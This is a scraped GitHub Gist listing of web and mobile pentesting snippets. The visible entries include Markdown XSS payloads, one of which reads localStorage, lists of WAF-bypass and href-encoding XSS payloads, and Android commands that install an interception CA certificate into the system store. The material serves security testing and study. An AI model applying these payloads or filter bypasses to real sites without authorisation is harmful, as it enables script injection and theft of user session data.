Skip to content

Instantly share code, notes, and snippets.

View mrrootsec's full-sized avatar
🐈
Meowing

MOHAMMAD SAQLAIN mrrootsec

🐈
Meowing
22 followers · 42 following
View GitHub Profile
@irsdl
irsdl / update_cookie_BambdaCA.java
Last active July 25, 2025 12:13
Automatically updates the Cookie header in Burp Repeater requests using Set-Cookie values from responses. This Bambda CustomAction preserves all existing cookies and only updates or adds values when necessary — ensuring session continuity without overwriting unrelated cookies.
@tamzidr
tamzidr / gist:ec225b4b9bc76971e41541cf32e319fc
Created March 8, 2025 13:01
Markdown XSS Payloads
Links:
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
Images:
@abbycantcode
abbycantcode / web_server.py
Created September 7, 2023 18:51
A custom web-server written in python3
#! /usr/bin/python3
import http.server
import sys
import random
import string
import argparse
import socket
import logging
import signal
@0xdevalias
0xdevalias / _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active August 12, 2025 18:01
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@DanaEpp
DanaEpp / dump-endpoints.jq
Created November 26, 2022 00:05
jq query and filter to dump the HTTP method, route and description of every endpoint in an OpenAPI 3.0 document. Usage: jq -r -f dump-endpoints.jq openapidoc.json
.paths | to_entries | map(select(.key | test("^x-") | not)) | map ( .key as $path | .value | to_entries | map( select( .key | IN("get", "put", "post", "delete", "options", "head", "patch", "trace")) | { method: .key, path: $path, summary: .value.summary?, deprecated: .value.deprecated? })[] ) | map( .method + "\t" + .path + "\t" + .summary + (if .deprecated then " (deprecated)" else "" end)) []
@abbycantcode
abbycantcode / BurpSuiteSSLPassTrough.json
Created November 7, 2022 04:19 — forked from vsec7/BurpSuiteSSLPassTrough.json
Filter out the noise
{
"proxy":{
"ssl_pass_through":{
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":".*\\.google\\.com",
"protocol":"any"
},
@interference-security
interference-security / android-ssl-cert-install.md
Last active February 7, 2025 04:46
Android SSL Certificate Installation 
openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1
mv cacert.pem <hash>.0  
adb push <hash>.0 /sdcard/Download/
adb shell
su
mkdir -m 700 /sdcard/cert/
cp /system/etc/security/cacerts/* /sdcard/cert/
mount -t tmpfs tmpfs /system/etc/security/cacerts
@thevillagehacker
thevillagehacker / Android-pentest.md
Last active February 8, 2025 04:11
Android Penetration Testing Resources
@hackerscrolls
hackerscrolls / mutation_a.txt
Last active June 24, 2025 15:24
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@hackerscrolls
hackerscrolls / href_bypass.html
Last active April 14, 2025 08:18
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)